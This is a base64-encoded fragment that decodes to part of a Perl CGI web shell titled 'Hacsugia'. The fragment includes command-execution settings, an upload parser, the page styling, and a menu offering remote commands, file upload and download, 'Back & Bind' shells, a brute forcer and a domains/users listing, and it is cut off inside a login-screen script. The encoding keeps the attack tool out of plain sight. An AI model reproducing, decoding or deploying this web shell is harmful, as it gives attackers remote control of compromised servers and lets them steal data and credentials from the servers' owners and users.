wZXJhdGUgMiBjb21tYW5kcwoJCQkJCQkJCSMgaW4gYSBjb21tYW5kIGxpbmUgb24gVW5peC4KCiRDb21tYW5kVGltZW91dER1cmF0aW9uID0gMTAwMDA7CSMgVGltZSBpbiBzZWNvbmRzIGFmdGVyIGNvbW1hbmRzIHdpbGwgYmUga2lsbGVkCgkJCQkJCQkJIyBEb24ndCBzZXQgdGhpcyB0byBhIHZlcnkgbGFyZ2UgdmFsdWUuIFRoaXMgaXMKCQkJCQkJCQkjIHVzZWZ1bCBmb3IgY29tbWFuZHMgdGhhdCBtYXkgaGFuZyBvciB0aGF0CgkJCQkJCQkJIyB0YWtlIHZlcnkgbG9uZyB0byBleGVjdXRlLCBsaWtlICJmaW5kIC8iLgoJCQkJCQkJCSMgVGhpcyBpcyB2YWxpZCBvbmx5IG9uIFVuaXggc2VydmVycy4gSXQgaXMKCQkJCQkJCQkjIGlnbm9yZWQgb24gTlQgU2VydmVycy4KCiRTaG93RHluYW1pY091dHB1dCA9IDE7CQkJIyBJZiB0aGlzIGlzIDEsIHRoZW4gZGF0YSBpcyBzZW50IHRvIHRoZQoJCQkJCQkJCSMgYnJvd3NlciBhcyBzb29uIGFzIGl0IGlzIG91dHB1dCwgb3RoZXJ3aXNlCgkJCQkJCQkJIyBpdCBpcyBidWZmZXJlZCBhbmQgc2VuZCB3aGVuIHRoZSBjb21tYW5kCgkJCQkJCQkJIyBjb21wbGV0ZXMuIFRoaXMgaXMgdXNlZnVsIGZvciBjb21tYW5kcyBsaWtlCgkJCQkJCQkJIyBwaW5nLCBzbyB0aGF0IHlvdSBjYW4gc2VlIHRoZSBvdXRwdXQgYXMgaXQKCQkJCQkJCQkjIGlzIGJlaW5nIGdlbmVyYXRlZC4KCiMgRE9OJ1QgQ0hBTkdFIEFOWVRISU5HIEJFTE9XIFRISVMgTElORSBVTkxFU1MgWU9VIEtOT1cgV0hBVCBZT1UnUkUgRE9JTkcgISEKCiRDbWRTZXAgPSAoJFdpbk5UID8gJE5UQ21kU2VwIDogJFVuaXhDbWRTZXApOwokQ21kUHdkID0gKCRXaW5OVCA/ICJjZCIgOiAicHdkIik7CiRQYXRoU2VwID0gKCRXaW5OVCA/ICJcXCIgOiAiLyIpOwokUmVkaXJlY3RvciA9ICgkV2luTlQgPyAiIDI+JjEgMT4mMiIgOiAiIDE+JjEgMj4mMSIpOwokY29scz0gMTUwOwokcm93cz0gMjY7CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBSZWFkcyB0aGUgaW5wdXQgc2VudCBieSB0aGUgYnJvd3NlciBhbmQgcGFyc2VzIHRoZSBpbnB1dCB2YXJpYWJsZXMuIEl0CiMgcGFyc2VzIEdFVCwgUE9TVCBhbmQgbXVsdGlwYXJ0L2Zvcm0tZGF0YSB0aGF0IGlzIHVzZWQgZm9yIHVwbG9hZGluZyBmaWxlcy4KIyBUaGUgZmlsZW5hbWUgaXMgc3RvcmVkIGluICRpbnsnZid9IGFuZCB0aGUgZGF0YSBpcyBzdG9yZWQgaW4gJGlueydmaWxlZGF0YSd9LgojIE90aGVyIHZhcmlhYmxlcyBjYW4gYmUgYWNjZXNzZWQgdXNpbmcgJGlueyd2YXInfSwgd2hlcmUgdmFyIGlzIHRoZSBuYW1lIG9mCiMgdGhlIHZhcmlhYmxlLiBOb3RlOiBNb3N0IG9mIHRoZSBjb2RlIGluIHRoaXMgZnVuY3Rpb24gaXMgdGFrZW4gZnJvbSBvdGhlciBDR0kKIyBzY3JpcHRzLgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBSZWFkUGFyc2UgCnsKCWxvY2FsICgqaW4pID0gQF8gaWYgQF87Cglsb2NhbCAoJGksICRsb2MsICRrZXksICR2YWwpOwoJCgkkTXVsdGlwYXJ0Rm9ybURhdGEgPSAkRU5WeydDT05URU5UX1RZUEUnfSA9fiAvbXVsdGlwYXJ0XC9mb3JtLWRhdGE7IGJvdW5kYXJ5PSguKykkLzsKCglpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJHRVQiKQoJewoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9OwoJfQoJZWxzaWYoJEVOVnsnUkVRVUVTVF9NRVRIT0QnfSBlcSAiUE9TVCIpCgl7CgkJYmlubW9kZShTVERJTikgaWYgJE11bHRpcGFydEZvcm1EYXRhICYgJFdpbk5UOwoJCXJlYWQoU1RESU4sICRpbiwgJEVOVnsnQ09OVEVOVF9MRU5HVEgnfSk7Cgl9CgoJIyBoYW5kbGUgZmlsZSB1cGxvYWQgZGF0YQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBib3VuZGFyeT0oLispJC8pCgl7CgkJJEJvdW5kYXJ5ID0gJy0tJy4kMTsgIyBwbGVhc2UgcmVmZXIgdG8gUkZDMTg2NyAKCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyAKCQkkSGVhZGVyQm9keSA9ICRsaXN0WzFdOwoJCSRIZWFkZXJCb2R5ID1+IC9cclxuXHJcbnxcblxuLzsKCQkkSGVhZGVyID0gJGA7CgkJJEJvZHkgPSAkJzsKIAkJJEJvZHkgPX4gcy9cclxuJC8vOyAjIHRoZSBsYXN0IFxyXG4gd2FzIHB1dCBpbiBieSBOZXRzY2FwZQoJCSRpbnsnZmlsZWRhdGEnfSA9ICRCb2R5OwoJCSRIZWFkZXIgPX4gL2ZpbGVuYW1lPVwiKC4rKVwiLzsgCgkJJGlueydmJ30gPSAkMTsgCgkJJGlueydmJ30gPX4gcy9cIi8vZzsKCQkkaW57J2YnfSA9fiBzL1xzLy9nOwoKCQkjIHBhcnNlIHRyYWlsZXIKCQlmb3IoJGk9MjsgJGxpc3RbJGldOyAkaSsrKQoJCXsgCgkJCSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOwoJCQkkbGlzdFskaV0gPX4gL1wiKFx3KylcIi87CgkJCSRrZXkgPSAkMTsKCQkJJHZhbCA9ICQnOwoJCQkkdmFsID1+IHMvKF4oXHJcblxyXG58XG5cbikpfChcclxuJHxcbiQpLy9nOwoJCQkkdmFsID1+IHMvJSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOwoJCQkkaW57JGtleX0gPSAkdmFsOyAKCQl9Cgl9CgllbHNlICMgc3RhbmRhcmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkKCXsKCQlAaW4gPSBzcGxpdCgvJi8sICRpbik7CgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQoJCXsKCQkJJGluWyRpXSA9fiBzL1wrLyAvZzsKCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsKCQkJJGtleSA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJHZhbCA9fiBzLyUoLi4pL3BhY2soImMiLCBoZXgoJDEpKS9nZTsKCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRlZmluZWQoJGlueyRrZXl9KSk7CgkJCSRpbnska2V5fSAuPSAkdmFsOwoJCX0KCX0KfQoKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQojIFByaW50cyB0aGUgSFRNTCBQYWdlIEhlYWRlcgojIEFyZ3VtZW50IDE6IEZvcm0gaXRlbSBuYW1lIHRvIHdoaWNoIGZvY3VzIHNob3VsZCBiZSBzZXQKIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQpzdWIgUHJpbnRQYWdlSGVhZGVyCnsKCSRFbmNvZGVkQ3VycmVudERpciA9ICRDdXJyZW50RGlyOwoJJEVuY29kZWRDdXJyZW50RGlyID1+IHMvKFteYS16QS1aMC05XSkvJyUnLnVucGFjaygiSCoiLCQxKS9lZzsKCW15ICRkaXIgPSRDdXJyZW50RGlyOwoJJGRpcj1+IHMvXFwvXFxcXC9nOwoJcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7CglwcmludCA8PEVORDsKPGh0bWw+CjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+Cjx0aXRsZT5IYWNzdWdpYTwvdGl0bGU+CgokSHRtbE1ldGFIZWFkZXIKCjwvaGVhZD4KPHN0eWxlPgpib2R5ewpmb250OiAxMHB0IFZlcmRhbmE7Cn0KdHIgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKY29sb3I6ICNmZjk5MDA7Cn0KdGQgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKY29sb3I6ICMyQkE4RUM7CmZvbnQ6IDEwcHQgVmVyZGFuYTsKfQoKdGFibGUgewpCT1JERVItUklHSFQ6ICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLVRPUDogICAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1MRUZUOiAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItQk9UVE9NOiAjM2UzZTNlIDFweCBzb2xpZDsKQkFDS0dST1VORC1DT0xPUjogIzExMTsKfQoKCmlucHV0IHsKQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1UT1A6ICAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItTEVGVDogICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLUJPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7CkJBQ0tHUk9VTkQtQ09MT1I6IEJsYWNrOwpmb250OiAxMHB0IFZlcmRhbmE7CmNvbG9yOiAjZmY5OTAwOwp9CgppbnB1dC5zdWJtaXQgewp0ZXh0LXNoYWRvdzogMHB0IDBwdCAwLjNlbSBjeWFuLCAwcHQgMHB0IDAuM2VtIGN5YW47CmNvbG9yOiAjRkZGRkZGOwpib3JkZXItY29sb3I6ICMwMDk5MDA7Cn0KCmNvZGUgewpib3JkZXIJCQk6IGRhc2hlZCAwcHggIzMzMzsKQkFDS0dST1VORC1DT0xPUjogQmxhY2s7CmZvbnQ6IDEwcHQgVmVyZGFuYSBib2xkOwpjb2xvcjogd2hpbGU7Cn0KCnJ1biB7CmJvcmRlcgkJCTogZGFzaGVkIDBweCAjMzMzOwpmb250OiAxMHB0IFZlcmRhbmEgYm9sZDsKY29sb3I6ICNGRjAwQUE7Cn0KCnRleHRhcmVhIHsKQk9SREVSLVJJR0hUOiAgIzNlM2UzZSAxcHggc29saWQ7CkJPUkRFUi1UT1A6ICAgICMzZTNlM2UgMXB4IHNvbGlkOwpCT1JERVItTEVGVDogICAjM2UzZTNlIDFweCBzb2xpZDsKQk9SREVSLUJPVFRPTTogIzNlM2UzZSAxcHggc29saWQ7CkJBQ0tHUk9VTkQtQ09MT1I6ICMxYjFiMWI7CmZvbnQ6IEZpeGVkc3lzIGJvbGQ7CmNvbG9yOiAjYWFhOwp9CkE6bGluayB7CglDT0xPUjogIzJCQThFQzsgVEVYVC1ERUNPUkFUSU9OOiBub25lCn0KQTp2aXNpdGVkIHsKCUNPTE9SOiAjMkJBOEVDOyBURVhULURFQ09SQVRJT046IG5vbmUKfQpBOmhvdmVyIHsKCXRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsKCWNvbG9yOiAjZmY5OTAwOyBURVhULURFQ09SQVRJT046IG5vbmUKfQpBOmFjdGl2ZSB7Cgljb2xvcjogUmVkOyBURVhULURFQ09SQVRJT046IG5vbmUKfQoKLmxpc3RkaXIgdHI6aG92ZXJ7CgliYWNrZ3JvdW5kOiAjNDQ0Owp9Ci5saXN0ZGlyIHRyOmhvdmVyIHRkewoJYmFja2dyb3VuZDogIzQ0NDsKCXRleHQtc2hhZG93OiAwcHQgMHB0IDAuM2VtIGN5YW4sIDBwdCAwcHQgMC4zZW0gY3lhbjsKCWNvbG9yOiAjRkZGRkZGOyBURVhULURFQ09SQVRJT046IG5vbmU7Cn0KLm5vdGxpbmV7CgliYWNrZ3JvdW5kOiAjMTExOwp9Ci5saW5lewoJYmFja2dyb3VuZDogIzIyMjsKfQo8L3N0eWxlPgo8c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0Ij4KZnVuY3Rpb24gY2htb2RfZm9ybShpLGZpbGUpCnsKCS8qdmFyIGFqYXg9J2FqYXhfUG9zdERhdGEoIkZvcm1QZXJtc18nK2krJyIsIiRTY3JpcHRMb2NhdGlvbiIsIlJlc3BvbnNlRGF0YSIpOyByZXR1cm4gZmFsc2U7JzsqLwoJdmFyIGFqYXg9IiI7Cglkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZVBlcm1zXyIraSkuaW5uZXJIVE1MPSI8Zm9ybSBuYW1lPUZvcm1QZXJtc18iICsgaSsgIiBhY3Rpb249JycgbWV0aG9kPSdQT1NUJz48aW5wdXQgaWQ9dGV4dF8iICsgaSArICIgIG5hbWU9Y2htb2QgdHlwZT10ZXh0IHNpemU9NSAvPjxpbnB1dCB0eXBlPXN1Ym1pdCBjbGFzcz0nc3VibWl0JyBvbmNsaWNrPSciICsgYWpheCArICInIHZhbHVlPU9LPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJGRpcic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZiB2YWx1ZT0nIitmaWxlKyInPjwvZm9ybT4iOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInRleHRfIiArIGkpLmZvY3VzKCk7Cn0KZnVuY3Rpb24gcm1fY2htb2RfZm9ybShyZXNwb25zZSxpLHBlcm1zLGZpbGUpCnsKCXJlc3BvbnNlLmlubmVySFRNTCA9ICI8c3BhbiBvbmNsaWNrPVxcXCJjaG1vZF9mb3JtKCIgKyBpICsgIiwnIisgZmlsZSsgIicpXFxcIiA+IisgcGVybXMgKyI8L3NwYW4+PC90ZD4iOwp9CmZ1bmN0aW9uIHJlbmFtZV9mb3JtKGksZmlsZSxmKQp7Cgl2YXIgYWpheD0iIjsKCWYucmVwbGFjZSgvXFxcXC9nLCJcXFxcXFxcXCIpOwoJdmFyIGJhY2s9InJtX3JlbmFtZV9mb3JtKCIraSsiLFxcXCIiK2ZpbGUrIlxcXCIsXFxcIiIrZisiXFxcIik7IHJldHVybiBmYWxzZTsiOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9Ijxmb3JtIG5hbWU9Rm9ybVBlcm1zXyIgKyBpKyAiIGFjdGlvbj0nJyBtZXRob2Q9J1BPU1QnPjxpbnB1dCBpZD10ZXh0XyIgKyBpICsgIiAgbmFtZT1yZW5hbWUgdHlwZT10ZXh0IHZhbHVlPSAnIitmaWxlKyInIC8+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIG9uY2xpY2s9JyIgKyBhamF4ICsgIicgdmFsdWU9T0s+PGlucHV0IHR5cGU9c3VibWl0IGNsYXNzPSdzdWJtaXQnIG9uY2xpY2s9JyIgKyBiYWNrICsgIicgdmFsdWU9Q2FuY2VsPjxpbnB1dCB0eXBlPWhpZGRlbiBuYW1lPWEgdmFsdWU9J2d1aSc+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZCB2YWx1ZT0nJGRpcic+PGlucHV0IHR5cGU9aGlkZGVuIG5hbWU9ZiB2YWx1ZT0nIitmaWxlKyInPjwvZm9ybT4iOwoJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoInRleHRfIiArIGkpLmZvY3VzKCk7Cn0KZnVuY3Rpb24gcm1fcmVuYW1lX2Zvcm0oaSxmaWxlLGYpCnsKCWlmKGY9PSdmJykKCXsKCQlkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgiRmlsZV8iK2kpLmlubmVySFRNTD0iPGEgaHJlZj0nP2E9Y29tbWFuZCZkPSRkaXImYz1lZGl0JTIwIitmaWxlKyIlMjAnPiIgK2ZpbGUrICI8L2E+IjsKCX1lbHNlCgl7CgkJZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoIkZpbGVfIitpKS5pbm5lckhUTUw9IjxhIGhyZWY9Jz9hPWd1aSZkPSIrZisiJz5bICIgK2ZpbGUrICIgXTwvYT4iOwoJfQp9Cjwvc2NyaXB0Pgo8Ym9keSBvbkxvYWQ9ImRvY3VtZW50LmYuQF8uZm9jdXMoKSIgYmdjb2xvcj0iIzBjMGMwYyIgdG9wbWFyZ2luPSIwIiBsZWZ0bWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMCIgbWFyZ2luaGVpZ2h0PSIwIj4KPGNlbnRlcj48Y29kZT4KPHRhYmxlIGJvcmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+Cjx0cj4KCTx0ZCBhbGlnbj0iY2VudGVyIiByb3dzcGFuPTI+CgkJPGI+PGZvbnQgc2l6ZT0iNSI+JEVkaXRQZXJzaW9uPC9mb250PjwvYj4KCTwvdGQ+CgoJPHRkPgoKCQk8Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4kRU5WeyJTRVJWRVJfU09GVFdBUkUifTwvZm9udD4KCTwvdGQ+Cgk8dGQ+U2VydmVyIElQOjxmb250IGNvbG9yPSIjY2MwMDAwIj4gJEVOVnsnU0VSVkVSX0FERFInfTwvZm9udD4gfCBZb3VyIElQOiA8Zm9udCBjb2xvcj0iIzAwMDAwMCI+JEVOVnsnUkVNT1RFX0FERFInfTwvZm9udD4KCTwvdGQ+Cgo8L3RyPgoKPHRyPgo8dGQgY29sc3Bhbj0iMyI+PGZvbnQgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+CjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbiI+SG9tZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9Y29tbWFuZCZkPSRFbmNvZGVkQ3VycmVudERpciI+Q29tbWFuZDwvYT4gfAo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1ndWkmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkdVSTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj5VcGxvYWQgRmlsZTwvYT4gfCAKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxvYWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPkRvd25sb2FkIEZpbGU8L2E+IHwKCjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWJhY2tiaW5kIj5CYWNrICYgQmluZDwvYT4gfAo8YSBocmVmPSIkU2NyaXB0TG9jYXRpb24/YT1icnV0ZWZvcmNlciI+QnJ1dGUgRm9yY2VyPC9hPiB8CjxhIGhyZWY9IiRTY3JpcHRMb2NhdGlvbj9hPWNoZWNrbG9nIj5DaGVjayBMb2c8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG9tYWluc3VzZXIiPkRvbWFpbnMvVXNlcnM8L2E+IHwKPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij5Mb2dvdXQ8L2E+IHwKPGEgdGFyZ2V0PSdfYmxhbmsnIGhyZWY9IiMiPkhlbHA8L2E+Cgo8L2ZvbnQ+PC90ZD4KPC90cj4KPC90YWJsZT4KPGZvbnQgaWQ9IlJlc3BvbnNlRGF0YSIgY29sb3I9IiNmZjk5Y2MiID4KRU5ECn0KCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0KIyBQcmludHMgdGhlIExvZ2luIFNjcmVlbgojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCnN1YiBQcmludExvZ2luU2NyZWVuCnsKCglwcmludCA8PEVORDsKPHByZT48c2NyaXB0IHR5cGU9InRleHQvamF2YXNjcmlwdCI+ClR5cGluZ1RleHQgPSBmdW5jdGlvbihlbGVtZW50LCBpbnRlcnZhbCwgY3Vyc29yLCBmaW5pc2hlZENhbGxiYWNrKSB7CiAgaWYoKHR5cGVvZiBkb2N1bWVudC5nZXRFbGVtZW50QnlJZCA9PSAidW5kZWZpbmVkIikgfHwgKHR5cGVvZiBlbGVtZW50LmlubmVySFRNTCA9PSAidW5kZWZpbmVkIikpIHsKICAgIHRoaXMucnVubmluZyA9IHRydWU7CS8vIE5ldmVyIHJ1bi4KICAgIHJldHVybjsKICB9CiAgdGhpcy5lbGVtZW50ID0gZWxlbWVudDsKICB0aGlzLmZpbmlzaGVkQ2FsbGJhY2sgPSAoZmluaXNoZWRDYWxsYmFjayA/IGZpbmlzaGVkQ2FsbGJhY2sgOiBmdW5jdGlvbigpIHsgcmV0dXJuOyB9KTsKICB0aGlzLmludGVydmFsID0gKHR5cGVvZiBpbnRlcnZhbCA9PSAidW5kZWZpbmVkIiA/IDEwMCA6IGludGVydmFsKTsKICB0aGlzLm9yaWdUZXh0ID0gdGhpcy5lbGVtZW50LmlubmVySFRNTDsKICB0aGlzLnVucGFyc2VkT3JpZ1RleHQgPSB0aGlzLm9yaWdUZXh0OwogIHRoaXMuY3Vyc29yID0gKGN1cnNvciA/IGN1cnNvciA6ICIiKTsKICB0aGlzLmN1cnJlbnRUZXh0ID0gIiI7CiAgdGhpcy5jdXJyZW50Q2hhciA9IDA7CiAgdGhpcy5lbGVtZW50LnR5cGluZ1RleHQgPSB0aGlzOwogIGlmKHRoaXMuZWxlbWVudC5pZCA9PSAiIikgdGhpcy5lbGVtZW50LmlkID0gInR5cGluZ3RleHQiICsgVHlwaW5nVGV4dC5jdXJyZW50SW5kZXgrKzsKICBUeXBpbmdUZXh0LmFsbC5wdXNoKHRoaXMpOwogIHRoaXMucnVubmluZyA9IGZhbHNlOwogIHRoaXMuaW5UYWcgPSBmYWxzZTsKICB0aGlzLnRhZ0J1ZmZlciA9ICIiOwogIHRoaXMuaW5IVE1MRW50aXR5ID0gZmFsc2U7CiAgdGhpcy5IVE1MRW50aXR5QnVmZmVyID0gIiI7Cn0KVHlwaW5nVGV4dC5hbGwgPSBuZXcgQXJyYXkoKTsKVHlwaW5nVGV4dC5jdXJyZW50SW5kZXggPSAwOwpUeXBpbmdUZXh0LnJ1bkFsbCA9IGZ1bmN0aW9uKCkgewogIGZvcih2YXIgaSA9IDA7IGkgPCBUeXBpbmdUZXh0LmFsbC5sZW5ndGg7IGkrKykgVHlwaW5nVGV4dC5hbGxbaV0ucnVuKCk7Cn0KVHlwaW5nVGV4dC5wcm90b3R5cGUucnVuID0gZnVuY3Rpb24oKSB7CiAgaWYodGhpcy5ydW5uaW5nKSByZXR1cm47CiAgaWYodHlwZW9mIHRoaXMub3JpZ1RleHQgPT0gInVuZGVmaW5lZCIpIHsKICAgIHNldFRpbWVvdXQoImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCciICsgdGhpcy5lbGVtZW50LmlkICsgIicpLnR5cGluZ1RleHQucnVuKCkiLCB0aGlzLmludGVydmFsKTsJLy8gV2UgaGF2ZW4ndCBmaW5pc2hlZCBsb2FkaW5nIHlldC4gIEhhdmUgcGF0aWVuY2UuCiAgICByZXR1cm47CiAgfQogIGlmKHRoaXMuY3VycmVudFRleHQgPT0gIiIpIHRoaXMuZWxlbWVudC5pbm5lckhUTUwgPSAiIjsKLy8gIHRoaXMub3JpZ1RleHQgPSB0aGlzLm9yaWdUZXh0LnJlcGxhY2UoLzwoW148XSkqPi8sICIiKTsgICAgIC8vIFN0cmlwIEhUTUwgZnJvbSB0ZXh0LgogIGlmKHRoaXMuY3VycmVudENoYXIgPCB0aGlzLm9yaWdUZXh0Lmxlbmd0aCkgewogICAgaWYodGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcikgPT0gIjwiICYmICF0aGlzLmluVGFnKSB7CiAgICAgIHRoaXMudGFnQnVmZmVyID0gIjwiOwogICAgICB0aGlzLmluVGFnID0gdHJ1ZTsKICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOwogICAgICB0aGlzLnJ1bigpOwogICAgICByZXR1cm47CiAgICB9IGVsc2UgaWYodGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcikgPT0gIj4iICYmIHRoaXMuaW5UYWcpIHsKICAgICAgdGhpcy50YWdCdWZmZXIgKz0gIj4iOwogICAgICB0aGlzLmluVGFnID0gZmFsc2U7CiAgICAgIHRoaXMuY3VycmVudFRleHQgKz0gdGhpcy50YWdCdWZmZXI7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMuaW5UYWcpIHsKICAgICAgdGhpcy50YWdCdWZmZXIgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICImIiAmJiAhdGhpcy5pbkhUTUxFbnRpdHkpIHsKICAgICAgdGhpcy5IVE1MRW50aXR5QnVmZmVyID0gIiYiOwogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IHRydWU7CiAgICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgICAgdGhpcy5ydW4oKTsKICAgICAgcmV0dXJuOwogICAgfSBlbHNlIGlmKHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpID09ICI7IiAmJiB0aGlzLmluSFRNTEVudGl0eSkgewogICAgICB0aGlzLkhUTUxFbnRpdHlCdWZmZXIgKz0gIjsiOwogICAgICB0aGlzLmluSFRNTEVudGl0eSA9IGZhbHNlOwogICAgICB0aGlzLmN1cnJlbnRUZXh0ICs9IHRoaXMuSFRNTEVudGl0eUJ1ZmZlcjsKICAgICAgdGhpcy5jdXJyZW50Q2hhcisrOwogICAgICB0aGlzLnJ1bigpOwogICAgICByZXR1cm47CiAgICB9IGVsc2UgaWYodGhpcy5pbkhUTUxFbnRpdHkpIHsKICAgICAgdGhpcy5IVE1MRW50aXR5QnVmZmVyICs9IHRoaXMub3JpZ1RleHQuY2hhckF0KHRoaXMuY3VycmVudENoYXIpOwogICAgICB0aGlzLmN1cnJlbnRDaGFyKys7CiAgICAgIHRoaXMucnVuKCk7CiAgICAgIHJldHVybjsKICAgIH0gZWxzZSB7CiAgICAgIHRoaXMuY3VycmVudFRleHQgKz0gdGhpcy5vcmlnVGV4dC5jaGFyQXQodGhpcy5jdXJyZW50Q2hhcik7CiAgICB9CiAgICB0aGlzLmVsZW1lbnQuaW5uZXJIVE1MID0gdGhpcy5jdXJyZW50VGV4dDsKICAgIHRoaXMuZWxlbWVudC5pbm5lckhUTUwgKz0gKHRoaXMuY3VycmVudENoYXIgPCB0aGlzLm9yaWdUZXh0Lmxlbmd0aCAtIDEgPyAodHlwZW9mIHRoaXMuY3Vyc29yID09ICJmdW5jdGlvbiIgPyB0aGlzLmN1cnNvcih0aGlzLmN1cnJlbnRUZXh0KSA6IHRoaXMuY3Vyc29yKSA6ICIiKTsKICAgIHRoaXMuY3VycmVudENoYXIrKzsKICAgIHNldFRpbWVvdXQoImRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCciICsgdGhpcy5lbGVtZW50LmlkICsgIicpLnR5cGluZ1RleHQucnVuKCkiLCB0aGlzLmludGVydmFsKTsKICB9IGVsc2UgewoJdGhpcy5jdXJyZW50VGV4dCA9ICIiOwoJdGhpcy5jdXJyZW50Q2hhciA9IDA7CiAgICAgICAgdGhpcy5ydW5uaW5nID0gZmFsc2U7CiAgICAgICAgdGhpcy5maW5pc2hlZENhbGxiYWNrKCk7CiAgfQp9Cjwvc2NyaXB0Pgo8L